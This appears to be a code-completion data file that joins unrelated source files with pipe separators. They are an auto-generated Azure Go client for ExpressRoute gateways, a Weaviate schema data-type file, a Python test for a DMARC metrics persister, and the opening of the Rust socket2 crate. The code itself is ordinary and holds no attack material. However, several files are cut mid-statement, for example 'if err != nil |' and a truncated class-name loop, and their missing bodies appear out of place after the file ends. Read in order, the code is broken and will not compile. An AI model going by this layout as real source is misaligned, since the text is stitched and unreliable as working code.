// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/validation"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// ExpressRouteGatewaysClient is the network Client
type ExpressRouteGatewaysClient struct {
BaseClient
}
// NewExpressRouteGatewaysClient creates an instance of the ExpressRouteGatewaysClient client.
func NewExpressRouteGatewaysClient(subscriptionID string) ExpressRouteGatewaysClient {
return NewExpressRouteGatewaysClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewExpressRouteGatewaysClientWithBaseURI creates an instance of the ExpressRouteGatewaysClient client using a custom
// endpoint. Use this when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure
// stack).
func NewExpressRouteGatewaysClientWithBaseURI(baseURI string, subscriptionID string) ExpressRouteGatewaysClient {
return ExpressRouteGatewaysClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// CreateOrUpdate creates or updates a ExpressRoute gateway in a specified resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
// putExpressRouteGatewayParameters - parameters required in an ExpressRoute gateway PUT operation.
func (client ExpressRouteGatewaysClient) CreateOrUpdate(ctx context.Context, resourceGroupName string, expressRouteGatewayName string, putExpressRouteGatewayParameters ExpressRouteGateway) (result ExpressRouteGatewaysCreateOrUpdateFuture, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.CreateOrUpdate")
defer func() {
sc := -1
if result.Response() != nil {
sc = result.Response().StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
if err := validation.Validate([]validation.Validation{
{TargetValue: putExpressRouteGatewayParameters,
Constraints: []validation.Constraint{{Target: "putExpressRouteGatewayParameters.ExpressRouteGatewayProperties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "putExpressRouteGatewayParameters.ExpressRouteGatewayProperties.VirtualHub", Name: validation.Null, Rule: true, Chain: nil}}}}}}); err != nil {
return result, validation.NewError("network.ExpressRouteGatewaysClient", "CreateOrUpdate", err.Error())
}
req, err := client.CreateOrUpdatePreparer(ctx, resourceGroupName, expressRouteGatewayName, putExpressRouteGatewayParameters)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "CreateOrUpdate", nil, "Failure preparing request")
return
}
result, err = client.CreateOrUpdateSender(req)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "CreateOrUpdate", nil, "Failure sending request")
return
}
return
}
// CreateOrUpdatePreparer prepares the CreateOrUpdate request.
func (client ExpressRouteGatewaysClient) CreateOrUpdatePreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string, putExpressRouteGatewayParameters ExpressRouteGateway) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
putExpressRouteGatewayParameters.Etag = nil
preparer := autorest.CreatePreparer(
autorest.AsContentType("application/json; charset=utf-8"),
autorest.AsPut(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithJSON(putExpressRouteGatewayParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) CreateOrUpdateSender(req *http.Request) (future ExpressRouteGatewaysCreateOrUpdateFuture, err error) {
var resp *http.Response
resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client))
if err != nil {
return
}
var azf azure.Future
azf, err = azure.NewFutureFromResponse(resp)
future.FutureAPI = &azf
future.Result = func(client ExpressRouteGatewaysClient) (erg ExpressRouteGateway, err error) {
var done bool
done, err = future.DoneWithContext(context.Background(), client)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysCreateOrUpdateFuture", "Result", future.Response(), "Polling failure")
return
}
if !done {
err = azure.NewAsyncOpIncompleteError("network.ExpressRouteGatewaysCreateOrUpdateFuture")
return
}
sender := autorest.DecorateSender(client, autorest.DoRetryForStatusCodes(client.RetryAttempts, client.RetryDuration, autorest.StatusCodesForRetry...))
if erg.Response.Response, err = future.GetResult(sender); err == nil && erg.Response.Response.StatusCode != http.StatusNoContent {
erg, err = client.CreateOrUpdateResponder(erg.Response.Response)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysCreateOrUpdateFuture", "Result", erg.Response.Response, "Failure responding to request")
}
}
return
}
return
}
// CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) CreateOrUpdateResponder(resp *http.Response) (result ExpressRouteGateway, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusCreated),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// Delete deletes the specified ExpressRoute gateway in a resource group. An ExpressRoute gateway resource can only be
// deleted when there are no connection subresources.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
func (client ExpressRouteGatewaysClient) Delete(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (result ExpressRouteGatewaysDeleteFuture, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.Delete")
defer func() {
sc := -1
if result.Response() != nil {
sc = result.Response().StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.DeletePreparer(ctx, resourceGroupName, expressRouteGatewayName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Delete", nil, "Failure preparing request")
return
}
result, err = client.DeleteSender(req)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Delete", nil, "Failure sending request")
return
}
return
}
// DeletePreparer prepares the Delete request.
func (client ExpressRouteGatewaysClient) DeletePreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsDelete(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// DeleteSender sends the Delete request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) DeleteSender(req *http.Request) (future ExpressRouteGatewaysDeleteFuture, err error) {
var resp *http.Response
resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client))
if err != nil {
return
}
var azf azure.Future
azf, err = azure.NewFutureFromResponse(resp)
future.FutureAPI = &azf
future.Result = func(client ExpressRouteGatewaysClient) (ar autorest.Response, err error) {
var done bool
done, err = future.DoneWithContext(context.Background(), client)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysDeleteFuture", "Result", future.Response(), "Polling failure")
return
}
if !done {
err = azure.NewAsyncOpIncompleteError("network.ExpressRouteGatewaysDeleteFuture")
return
}
ar.Response = future.Response()
return
}
return
}
// DeleteResponder handles the response to the Delete request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),
autorest.ByClosing())
result.Response = resp
return
}
// Get fetches the details of a ExpressRoute gateway in a resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
// expressRouteGatewayName - the name of the ExpressRoute gateway.
func (client ExpressRouteGatewaysClient) Get(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (result ExpressRouteGateway, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.Get")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.GetPreparer(ctx, resourceGroupName, expressRouteGatewayName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", nil, "Failure preparing request")
return
}
resp, err := client.GetSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", resp, "Failure sending request")
return
}
result, err = client.GetResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "Get", resp, "Failure responding to request")
return
}
return
}
// GetPreparer prepares the Get request.
func (client ExpressRouteGatewaysClient) GetPreparer(ctx context.Context, resourceGroupName string, expressRouteGatewayName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"expressRouteGatewayName": autorest.Encode("path", expressRouteGatewayName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways/{expressRouteGatewayName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// GetSender sends the Get request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) GetSender(req *http.Request) (*http.Response, error) {
return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// GetResponder handles the response to the Get request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) GetResponder(resp *http.Response) (result ExpressRouteGateway, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// ListByResourceGroup lists ExpressRoute gateways in a given resource group.
// Parameters:
// resourceGroupName - the name of the resource group.
func (client ExpressRouteGatewaysClient) ListByResourceGroup(ctx context.Context, resourceGroupName string) (result ExpressRouteGatewayList, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.ListByResourceGroup")
defer func() {
sc := -1
if result.Response.Response != nil {
sc = result.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
req, err := client.ListByResourceGroupPreparer(ctx, resourceGroupName)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", nil, "Failure preparing request")
return
}
resp, err := client.ListByResourceGroupSender(req)
if err != nil |
result, err = client.ListByResourceGroupResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", resp, "Failure responding to request")
return
}
return
}
// ListByResourceGroupPreparer prepares the ListByResourceGroup request.
func (client ExpressRouteGatewaysClient) ListByResourceGroupPreparer(ctx context.Context, resourceGroupName string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
const APIVersion = "2020-07-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteGateways", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// ListByResourceGroupSender sends the ListByResourceGroup request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) ListByResourceGroupSender(req *http.Request) (*http.Response, error) {
	// Sends through autorest's DoRetryWithRegistration decorator, which
	// retries the request (re-registering the resource provider as needed).
	return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// ListByResourceGroupResponder handles the response to the ListByResourceGroup request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) ListByResourceGroupResponder(resp *http.Response) (result ExpressRouteGatewayList, err error) {
	// Accept only 200 OK, unmarshal the JSON payload into result, and close
	// the body regardless of outcome.
	err = autorest.Respond(
		resp,
		azure.WithErrorUnlessStatusCode(http.StatusOK),
		autorest.ByUnmarshallingJSON(&result),
		autorest.ByClosing())
	result.Response = autorest.Response{Response: resp}
	return
}
// ListBySubscription lists ExpressRoute gateways under a given subscription.
//
// The call is traced when tracing is enabled; the span records the final HTTP
// status code (or -1 when no response was received). Errors from each stage
// (prepare, send, respond) are wrapped with the client and method name.
func (client ExpressRouteGatewaysClient) ListBySubscription(ctx context.Context) (result ExpressRouteGatewayList, err error) {
	if tracing.IsEnabled() {
		ctx = tracing.StartSpan(ctx, fqdn+"/ExpressRouteGatewaysClient.ListBySubscription")
		defer func() {
			// -1 indicates the request never produced an HTTP response.
			sc := -1
			if result.Response.Response != nil {
				sc = result.Response.Response.StatusCode
			}
			tracing.EndSpan(ctx, sc, err)
		}()
	}
	req, err := client.ListBySubscriptionPreparer(ctx)
	if err != nil {
		err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", nil, "Failure preparing request")
		return
	}
	resp, err := client.ListBySubscriptionSender(req)
	if err != nil {
		// Preserve the (possibly nil) response so callers can inspect it.
		result.Response = autorest.Response{Response: resp}
		err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", resp, "Failure sending request")
		return
	}
	result, err = client.ListBySubscriptionResponder(resp)
	if err != nil {
		err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListBySubscription", resp, "Failure responding to request")
		return
	}
	return
}
// ListBySubscriptionPreparer prepares the ListBySubscription request.
// It builds a GET request against the subscription-wide expressRouteGateways
// collection with the API version applied as a query parameter.
func (client ExpressRouteGatewaysClient) ListBySubscriptionPreparer(ctx context.Context) (*http.Request, error) {
	const APIVersion = "2020-07-01"
	urlParameters := map[string]interface{}{
		"subscriptionId": autorest.Encode("path", client.SubscriptionID),
	}
	query := map[string]interface{}{"api-version": APIVersion}
	prep := autorest.CreatePreparer(
		autorest.AsGet(),
		autorest.WithBaseURL(client.BaseURI),
		autorest.WithPathParameters("/subscriptions/{subscriptionId}/providers/Microsoft.Network/expressRouteGateways", urlParameters),
		autorest.WithQueryParameters(query))
	return prep.Prepare((&http.Request{}).WithContext(ctx))
}
// ListBySubscriptionSender sends the ListBySubscription request. The method will close the
// http.Response Body if it receives an error.
func (client ExpressRouteGatewaysClient) ListBySubscriptionSender(req *http.Request) (*http.Response, error) {
	// Sends through autorest's DoRetryWithRegistration decorator, which
	// retries the request (re-registering the resource provider as needed).
	return client.Send(req, azure.DoRetryWithRegistration(client.Client))
}
// ListBySubscriptionResponder handles the response to the ListBySubscription request. The method always
// closes the http.Response Body.
func (client ExpressRouteGatewaysClient) ListBySubscriptionResponder(resp *http.Response) (result ExpressRouteGatewayList, err error) {
	// Accept only 200 OK, unmarshal the JSON payload into result, and close
	// the body regardless of outcome.
	err = autorest.Respond(
		resp,
		azure.WithErrorUnlessStatusCode(http.StatusOK),
		autorest.ByUnmarshallingJSON(&result),
		autorest.ByClosing())
	result.Response = autorest.Response{Response: resp}
	return
}
| {
result.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "network.ExpressRouteGatewaysClient", "ListByResourceGroup", resp, "Failure sending request")
return
} |
data_types.go | // _ _
// __ _____ __ ___ ___ __ _| |_ ___
// \ \ /\ / / _ \/ _` \ \ / / |/ _` | __/ _ \
// \ V V / __/ (_| |\ V /| | (_| | || __/
// \_/\_/ \___|\__,_| \_/ |_|\__,_|\__\___|
//
// Copyright © 2016 - 2021 SeMI Technologies B.V. All rights reserved.
//
// CONTACT: [email protected]
//
package schema
import (
"errors"
"fmt"
"unicode"
)
// DataType identifies the data type of a schema property value.
type DataType string

const (
	// DataTypeCRef The data type is a cross-reference, it is starting with a capital letter
	DataTypeCRef DataType = "cref"
	// DataTypeString The data type is a value of type string
	DataTypeString DataType = "string"
	// DataTypeText The data type is a value of type text (string-valued)
	DataTypeText DataType = "text"
	// DataTypeInt The data type is a value of type int
	DataTypeInt DataType = "int"
	// DataTypeNumber The data type is a value of type number/float
	DataTypeNumber DataType = "number"
	// DataTypeBoolean The data type is a value of type boolean
	DataTypeBoolean DataType = "boolean"
	// DataTypeDate The data type is a value of type date
	DataTypeDate DataType = "date"
	// DataTypeGeoCoordinates is used to represent geo coordinates, i.e. latitude
	// and longitude pairs of locations on earth
	DataTypeGeoCoordinates DataType = "geoCoordinates"
	// DataTypePhoneNumber represents a parsed/to-be-parsed phone number
	DataTypePhoneNumber DataType = "phoneNumber"
)

// PrimitiveDataTypes lists every supported primitive (non-reference) data type.
var PrimitiveDataTypes []DataType = []DataType{DataTypeString, DataTypeText, DataTypeInt, DataTypeNumber, DataTypeBoolean, DataTypeDate, DataTypeGeoCoordinates, DataTypePhoneNumber}
// PropertyKind distinguishes primitive-valued properties from class references.
type PropertyKind int

const (
	// PropertyKindPrimitive marks a property holding a primitive value.
	PropertyKindPrimitive PropertyKind = 1
	// PropertyKindRef marks a property referencing one or more classes.
	PropertyKindRef PropertyKind = 2
)

// PropertyDataType describes the resolved data type of a schema property:
// either a single primitive type, or a reference to one or more classes.
type PropertyDataType interface {
	Kind() PropertyKind
	IsPrimitive() bool
	AsPrimitive() DataType
	IsReference() bool
	Classes() []ClassName
	ContainsClass(name ClassName) bool
}

// propertyDataType is the canonical PropertyDataType implementation. Depending
// on kind, exactly one of primitiveType (PropertyKindPrimitive) or classes
// (PropertyKindRef) is meaningful.
type propertyDataType struct {
	kind          PropertyKind
	primitiveType DataType
	classes       []ClassName
}

// Kind returns whether the property is primitive or a reference.
func (p *propertyDataType) Kind() PropertyKind {
	return p.kind
}

// IsPrimitive reports whether the property holds a primitive value.
func (p *propertyDataType) IsPrimitive() bool {
	return p.kind == PropertyKindPrimitive
}

// AsPrimitive returns the primitive data type.
// It panics when the property is not primitive; check IsPrimitive first.
func (p *propertyDataType) AsPrimitive() DataType {
	if p.kind != PropertyKindPrimitive {
		panic("not primitive type")
	}
	return p.primitiveType
}

// IsReference reports whether the property references other classes.
func (p *propertyDataType) IsReference() bool {
	return p.kind == PropertyKindRef
}

// Classes returns the referenced class names.
// It panics when the property is not a reference; check IsReference first.
func (p *propertyDataType) Classes() []ClassName {
	if p.kind != PropertyKindRef {
		panic("not MultipleRef type")
	}
	return p.classes
}

// ContainsClass reports whether needle is among the referenced classes.
// It panics when the property is not a reference; check IsReference first.
func (p *propertyDataType) ContainsClass(needle ClassName) bool {
	if p.kind != PropertyKindRef {
		panic("not MultipleRef type")
	}
	for _, class := range p.classes {
		if class == needle {
			return true
		}
	}
	return false
}
// Based on the schema, return a valid description of the defined datatype
func (s *Schema) FindPropertyDataType(dataType []string) (PropertyDataType, error) {
if len(dataType) < 1 {
return nil, errors.New("dataType must have at least one element")
} else if len(dataType) == 1 {
someDataType := dataType[0]
if len(someDataType) == 0 {
return nil, fmt.Errorf("dataType cannot be an empty string")
}
firstLetter := rune(someDataType[0])
if unicode.IsLower(firstLetter) {
switch someDataType {
case string(DataTypeString), string(DataTypeText),
string(DataTypeInt), string(DataTypeNumber),
string(DataTypeBoolean), string(DataTypeDate), string(DataTypeGeoCoordinates),
string(DataTypePhoneNumber):
return &propertyDataType{
kind: PropertyKindPrimitive,
primitiveType: DataType(someDataType),
}, nil
default:
return nil, fmt.Errorf("Unknown primitive data type '%s'", someDataType)
}
}
}
/* implies len(dataType) > 1, or first element is a class already */
var classes []ClassName
for _, someDataType := range dataType {
if ValidNetworkClassName(someDataType) { | else {
// this is a local reference
className, err := ValidateClassName(someDataType)
if err != nil {
return nil, err
}
if s.FindClassByName(className) == nil {
return nil, fmt.Errorf("SingleRef class name '%s' does not exist", className)
}
classes = append(classes, className)
}
}
return &propertyDataType{
kind: PropertyKindRef,
classes: classes,
}, nil
}
|
// this is a network instance
classes = append(classes, ClassName(someDataType))
} |
test_metrics_persister.py | from dmarc_metrics_exporter.dmarc_metrics import (
Disposition,
DmarcMetrics,
DmarcMetricsCollection,
Meta,
)
from dmarc_metrics_exporter.metrics_persister import MetricsPersister
def test_roundtrip_metrics(tmp_path):
    """Metrics saved to the persister's database can be loaded back unchanged."""
    metrics_db = tmp_path / "metrics.db"
    # Single-entry collection populating every DmarcMetrics counter field, so
    # the round trip exercises the full serialized shape.
    metrics = DmarcMetricsCollection(
        {
            Meta(
                reporter="google.com",
                from_domain="mydomain.de",
                dkim_domain="dkim-domain.org",
                spf_domain="spf-domain.org",
            ): DmarcMetrics(
                total_count=42,
                disposition_counts={Disposition.QUARANTINE: 4},
                dmarc_compliant_count=24,
                dkim_aligned_count=5,
                dkim_pass_count=10,
                spf_aligned_count=4,
                spf_pass_count=8,
            )
        }
    )
    persister = MetricsPersister(metrics_db)
    persister.save(metrics)
    assert persister.load() == metrics
def test_returns_newly_initialized_metrics_if_db_is_non_existent(tmp_path):
    """Loading from a non-existent database file yields an empty collection."""
    metrics_db = tmp_path / "metrics.db"
    persister = MetricsPersister(metrics_db)
    assert persister.load() == DmarcMetricsCollection()
|
lib.rs | // Copyright 2015 The Rust Project Developers.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Utilities for creating and using sockets.
//!
//! The goal of this crate is to create and use a socket using advanced
//! configuration options (those that are not available in the types in the
//! standard library) without using any unsafe code.
//!
//! This crate provides as direct as possible access to the system's
//! functionality for sockets, this means little effort to provide
//! cross-platform utilities. It is up to the user to know how to use sockets
//! when using this crate. *If you don't know how to create a socket using
//! libc/system calls then this crate is not for you*. Most, if not all,
//! functions directly relate to the equivalent system call with no error
//! handling applied, so no handling errors such as [`EINTR`]. As a result using
//! this crate can be a little wordy, but it should give you maximal flexibility
//! over configuration of sockets.
//!
//! [`EINTR`]: std::io::ErrorKind::Interrupted
//!
//! # Examples
//!
//! ```no_run
//! # fn main() -> std::io::Result<()> {
//! use std::net::{SocketAddr, TcpListener};
//! use socket2::{Socket, Domain, Type};
//!
//! // Create a TCP listener bound to two addresses.
//! let socket = Socket::new(Domain::IPV6, Type::STREAM, None)?;
//!
//! socket.set_only_v6(false)?;
//! let address: SocketAddr = "[::1]:12345".parse().unwrap();
//! socket.bind(&address.into())?;
//! socket.listen(128)?;
//!
//! let listener: TcpListener = socket.into();
//! // ...
//! # drop(listener);
//! # Ok(()) }
//! ```
//!
//! ## Features
//!
//! This crate has a single feature `all`, which enables all functions even ones
//! that are not available on all OSs.
#![doc(html_root_url = "https://docs.rs/socket2/0.3")]
#![deny(missing_docs, missing_debug_implementations, rust_2018_idioms)]
// Show required OS/features on docs.rs.
#![cfg_attr(docsrs, feature(doc_cfg))]
// Disallow warnings when running tests.
#![cfg_attr(test, deny(warnings))]
// Disallow warnings in examples.
#![doc(test(attr(deny(warnings))))]
use std::fmt;
use std::mem::MaybeUninit;
use std::net::SocketAddr;
use std::ops::{Deref, DerefMut};
use std::time::Duration;
/// Macro to implement `fmt::Debug` for a type, printing the constant names
/// rather than a number.
///
/// Note this is used in the `sys` module and thus must be defined before
/// defining the modules.
macro_rules! impl_debug {
    (
        // Type name for which to implement `fmt::Debug`.
        $type: path,
        $(
            $(#[$target: meta])*
            // The flag(s) to check. The flag crate must be spelled out because
            // Windows doesn't use `libc` but `winapi`.
            $libc: ident :: $flag: ident
        ),+ $(,)*
    ) => {
        impl std::fmt::Debug for $type {
            fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
                // Match the wrapped raw value against each known constant and
                // print its name; unknown values fall back to the number.
                let string = match self.0 {
                    $(
                        $(#[$target])*
                        $libc :: $flag => stringify!($flag),
                    )+
                    n => return write!(f, "{}", n),
                };
                f.write_str(string)
            }
        }
    };
}
/// Macro to convert from one network type to another.
///
/// Implements `From<$from> for $for` by transferring ownership of the raw OS
/// handle; `into_raw_fd`/`into_raw_socket` keeps the source from closing it.
macro_rules! from {
    ($from: ty, $for: ty) => {
        impl From<$from> for $for {
            fn from(socket: $from) -> $for {
                #[cfg(unix)]
                unsafe {
                    <$for>::from_raw_fd(socket.into_raw_fd())
                }
                #[cfg(windows)]
                unsafe {
                    <$for>::from_raw_socket(socket.into_raw_socket())
                }
            }
        }
    };
}
mod sockaddr;
mod socket;
mod sockref;
#[cfg(unix)]
#[path = "sys/unix.rs"]
mod sys;
#[cfg(windows)]
#[path = "sys/windows.rs"]
mod sys;
#[cfg(not(any(windows, unix)))]
compile_error!("Socket2 doesn't support the compile target");
use sys::c_int;
pub use sockaddr::SockAddr;
pub use socket::Socket;
pub use sockref::SockRef;
/// Specification of the communication domain for a socket.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation. Convenience constants such
/// as [`Domain::IPV4`], [`Domain::IPV6`], etc, are provided to avoid reaching
/// into libc for various constants.
///
/// If a raw value needs to be provided, however, this type is freely
/// interconvertible with C's `int` type.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Domain(c_int);

impl Domain {
    /// Domain for IPv4 communication, corresponding to `AF_INET`.
    pub const IPV4: Domain = Domain(sys::AF_INET);

    /// Domain for IPv6 communication, corresponding to `AF_INET6`.
    pub const IPV6: Domain = Domain(sys::AF_INET6);

    /// Returns the correct domain for `address`.
    pub const fn for_address(address: SocketAddr) -> Domain {
        match address {
            SocketAddr::V4(_) => Domain::IPV4,
            SocketAddr::V6(_) => Domain::IPV6,
        }
    }
}

impl From<c_int> for Domain {
    fn from(d: c_int) -> Domain {
        Domain(d)
    }
}

impl From<Domain> for c_int {
    fn from(d: Domain) -> c_int {
        d.0
    }
}
/// Specification of communication semantics on a socket.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation. Convenience constants such
/// as [`Type::STREAM`], [`Type::DGRAM`], etc, are provided to avoid reaching
/// into libc for various constants.
///
/// If a raw value needs to be provided, however, this type is freely
/// interconvertible with C's `int` type.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Type(c_int);

impl Type {
    /// Type corresponding to `SOCK_STREAM`.
    ///
    /// Used for protocols such as TCP.
    pub const STREAM: Type = Type(sys::SOCK_STREAM);

    /// Type corresponding to `SOCK_DGRAM`.
    ///
    /// Used for protocols such as UDP.
    pub const DGRAM: Type = Type(sys::SOCK_DGRAM);

    /// Type corresponding to `SOCK_SEQPACKET`.
    // Gated: not available on every OS; requires the `all` feature.
    #[cfg(all(feature = "all", not(target_os = "espidf")))]
    #[cfg_attr(docsrs, doc(cfg(all(feature = "all", not(target_os = "espidf")))))]
    pub const SEQPACKET: Type = Type(sys::SOCK_SEQPACKET);

    /// Type corresponding to `SOCK_RAW`.
    #[cfg(all(feature = "all", not(any(target_os = "redox", target_os = "espidf"))))]
    #[cfg_attr(
        docsrs,
        doc(cfg(all(feature = "all", not(any(target_os = "redox", target_os = "espidf")))))
    )]
    pub const RAW: Type = Type(sys::SOCK_RAW);
}

impl From<c_int> for Type {
    fn from(t: c_int) -> Type {
        Type(t)
    }
}

impl From<Type> for c_int {
    fn from(t: Type) -> c_int {
        t.0
    }
}
/// Protocol specification used for creating sockets via `Socket::new`.
///
/// This is a newtype wrapper around an integer which provides a nicer API in
/// addition to an injection point for documentation.
///
/// If a raw value needs to be provided, however, this type is freely
/// interconvertible with C's `int` type.
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct Protocol(c_int);

impl Protocol {
    /// Protocol corresponding to `ICMPv4`.
    pub const ICMPV4: Protocol = Protocol(sys::IPPROTO_ICMP);

    /// Protocol corresponding to `ICMPv6`.
    pub const ICMPV6: Protocol = Protocol(sys::IPPROTO_ICMPV6);

    /// Protocol corresponding to `TCP`.
    pub const TCP: Protocol = Protocol(sys::IPPROTO_TCP);

    /// Protocol corresponding to `UDP`.
    pub const UDP: Protocol = Protocol(sys::IPPROTO_UDP);
}

impl From<c_int> for Protocol {
    fn from(p: c_int) -> Protocol {
        Protocol(p)
    }
}

impl From<Protocol> for c_int {
    fn from(p: Protocol) -> c_int {
        p.0
    }
}
/// Flags for incoming messages.
///
/// Flags provide additional information about incoming messages.
#[cfg(not(target_os = "redox"))]
